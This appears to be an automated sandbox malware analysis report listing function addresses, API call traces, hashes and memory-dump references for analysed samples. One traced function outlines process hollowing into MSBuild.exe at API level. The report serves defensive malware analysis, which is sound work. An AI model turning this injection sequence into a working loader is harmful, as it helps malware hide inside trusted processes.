Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: 9c4c01dd84c6e621ed0deabd471cf696590cfdce7777f0111f9db290957cfb66
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: 30B137B29442879FDB11CF68C8817AEBBE9EF85340F14C56BE955EB381D6348D02CB60

Function 009A2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 009A2F5F
__Mtx_unlock.LIBCPMT ref: 009A2FCC
__Mtx_unlock.LIBCPMT ref: 009A30F5
__Mtx_unlock.LIBCPMT ref: 009A319B

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 898308d5562d2bd362accce9e486774cb586b832d363585dba16a757fca2440e
Instruction ID: 6a82eb96f6888dfaca0e0f7328ea2f23a7e341c21998e432b2577e1ec4289de3
Opcode Fuzzy Hash: 898308d5562d2bd362accce9e486774cb586b832d363585dba16a757fca2440e
Instruction Fuzzy Hash: D9A1C1B0A05215DFEB20DFA4C945B9AB7A8FF56324F048139F815D7281EB35EA04CBD1

Analysis Process: cd2469328d.exePID: 7664, Parent PID: 2472COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	0.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	22

Executed Functions

Function 0035519E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00355110,00355100), ref: 00355334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00355347
Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00355365
ReadProcessMemory.KERNELBASE(00000088,?,00355154,00000004,00000000), ref: 00355389
VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 003553B4
TerminateProcess.KERNELBASE(00000088,00000000), ref: 003553D3
WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 0035540C
WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 00355457
WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 00355495
Wow64SetThreadContext.KERNEL32(0000008C,010D0000), ref: 003554D1
ResumeThread.KERNELBASE(0000008C), ref: 003554E0

Strings

VirtualAlloc, xrefs: 00355263
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00355333
TerminateProcess, xrefs: 003553C3
SetThreadContext, xrefs: 003552C2
ResumeThread, xrefs: 003552D8
ress, xrefs: 00355226
ReadProcessMemory, xrefs: 00355289
CreateProcessW, xrefs: 00355250
GetThreadContext, xrefs: 00355276
GetP, xrefs: 0035521E
WriteProcessMemory, xrefs: 003552AF
aryA, xrefs: 003551E2
VirtualAllocEx, xrefs: 0035529C
Load, xrefs: 003551DA

Memory Dump Source

Source File: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: d1c3b14001910b283519785fbc610c2601f8463cbf7f9699453434708cb655ff
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: FEB1087660064AAFDB60CF68CC80BDA73A5FF88714F168524EA0CAB751D770FA41CB94

Function 00331614 Relevance: 9.2, APIs: 6, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00331098: _strlen.LIBCMT ref: 003310F9

CreateFileA.KERNELBASE ref: 00331675
GetFileSize.KERNEL32(00000000,00000000), ref: 00331685
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 003316AB
CloseHandle.KERNELBASE(00000000), ref: 003316BA
_strlen.LIBCMT ref: 00331705
CloseHandle.KERNEL32(00000000), ref: 00331805

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: File$CloseHandle_strlen$CreateReadSize
String ID:
API String ID: 2911764282-0
Opcode ID: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
Instruction ID: 6391c2f71201945b2327666c6f9712f871c14ec481b36ec80670bfc85c3ec831
Opcode Fuzzy Hash: d72d8173033cb09c37da75eb78a95cf91b32a95add117bb8070b4d6bdd94767b
Instruction Fuzzy Hash: FF51F1B19043009BD702AF24DCC5B2FB7E9FF88344F154A2DF4899B251E734D9448752

Function 0033155C Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00331098: _strlen.LIBCMT ref: 003310F9

FreeConsole.KERNELBASE ref: 0033158B

Part of subcall function 0033123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 003312C7

VirtualProtect.KERNELBASE(00355011,00000549,00000040,?), ref: 003315D7
ExitProcess.KERNEL32 ref: 0033160E

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
String ID:
API String ID: 2898289550-0
Opcode ID: 66eef3d80ee16b8100a8b64297df1ad91ce8b7b7885fe8eaab99010f633f0889
Instruction ID: c2fcb80b596608f38c91c225fe55885f94ff5378d16bf8cedc0b9934fbbaf48e
Opcode Fuzzy Hash: 66eef3d80ee16b8100a8b64297df1ad91ce8b7b7885fe8eaab99010f633f0889
Instruction Fuzzy Hash: C511CA71E002086BEB06AB65DC92FFF7768EF85701F404425F908AB2E1E675AD1547E1

Function 0033123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 003312C7

Strings

[+], xrefs: 003312E1

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: [+]
API String ID: 6842923-4228040803
Opcode ID: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
Instruction ID: a20e516cb6cae4faa6fadfd2449bea0bb9716dc07962e03462675f9676428fb2
Opcode Fuzzy Hash: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
Instruction Fuzzy Hash: A231F73550C3804BD717AB34A8D97EBBBD4ABBE318F19097DD8C9C7243D2A15449CB62

Function 00345283 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0034562D: GetConsoleOutputCP.KERNEL32(825BC0CB,00000000,00000000,?), ref: 00345690

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0033BBF3,?), ref: 00345408
GetLastError.KERNEL32(?,?,0033BBF3,?,0033BE37,00000000,?,00000000,0033BE37,?,?,?,00354628,0000002C,0033BD23,?), ref: 00345412

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 6eaac6eef9bf3e0d6a43b7e043a64072236a8488058d3c8b53f34d3deb028213
Instruction ID: b425f770c57ea15cc8c785de58480ca5333aba2ab9030a9348f4cc8388a1f866
Opcode Fuzzy Hash: 6eaac6eef9bf3e0d6a43b7e043a64072236a8488058d3c8b53f34d3deb028213
Instruction Fuzzy Hash: 1361B176D04619AFDF12CFA8C885AAEBBF9AF19344F150155E900AF253D371E941CB60

Function 00345A5C Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,003453EE,00000000,0033BE37,?,00000000,?,00000000), ref: 00345AF8
GetLastError.KERNEL32(?,003453EE,00000000,0033BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0033BBF3), ref: 00345B1E

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 1bb8fb876138a9fbe6887e42b017c6125c3f0af6ee7237c65e55481670e3a48e
Instruction ID: 5ec0b693b44d2a14f4bf159997a9140242ba40b545918be79f38149479799583
Opcode Fuzzy Hash: 1bb8fb876138a9fbe6887e42b017c6125c3f0af6ee7237c65e55481670e3a48e
Instruction Fuzzy Hash: 51216031A106199BCB16CF29DD809E9B7F9EB48341F2441A9E906DB222D630AE46CB60

Function 0033FF89 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0033FE78,00354948), ref: 0033FFD5
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0033FE78,00354948), ref: 0033FFE7

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 0a78751cd5d96a68b32b5cc203955ee8f139f4c5d7e33e47adca687d7f3c8292
Instruction ID: aec471fa251d6558ccaf18e8e5f64e1c4a83bd6dc6f8f0a13dbab0800c06ff30
Opcode Fuzzy Hash: 0a78751cd5d96a68b32b5cc203955ee8f139f4c5d7e33e47adca687d7f3c8292
Instruction Fuzzy Hash: 4211B471A047114AC7364A3D9CC8722BAD8AB52330F79072ED6B68B5F1C230ED42D240

Function 0033136E Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00331388

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 060ccb874e7e6bafe4785d2fc8f319bc7647c00100f7dd6dd05024e457e61d68
Instruction ID: 924c8ddf7c316b29a4ca9bc97e1f79f146c0c495a90516997c4f4d619146d218
Opcode Fuzzy Hash: 060ccb874e7e6bafe4785d2fc8f319bc7647c00100f7dd6dd05024e457e61d68
Instruction Fuzzy Hash: C6518D313042049FCB15DF6DC9D4B6AB7E6EF88728F198668E969CB392D630ED05CB41

Function 00333C29 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f37a4e1003a141cf6198bda276776455e959de4de73b44f1158f5983e13869
Instruction ID: 54173b05368fad4d4e145b891d55833f7ed59498ffc34c21c6866d9d9f01746d
Opcode Fuzzy Hash: 08f37a4e1003a141cf6198bda276776455e959de4de73b44f1158f5983e13869
Instruction Fuzzy Hash: FD31757290411AAFCF16CF68D8D09EDB7B9BF09320F145265E512E7690D731FA44CB50

Function 00333C1B Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true

Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
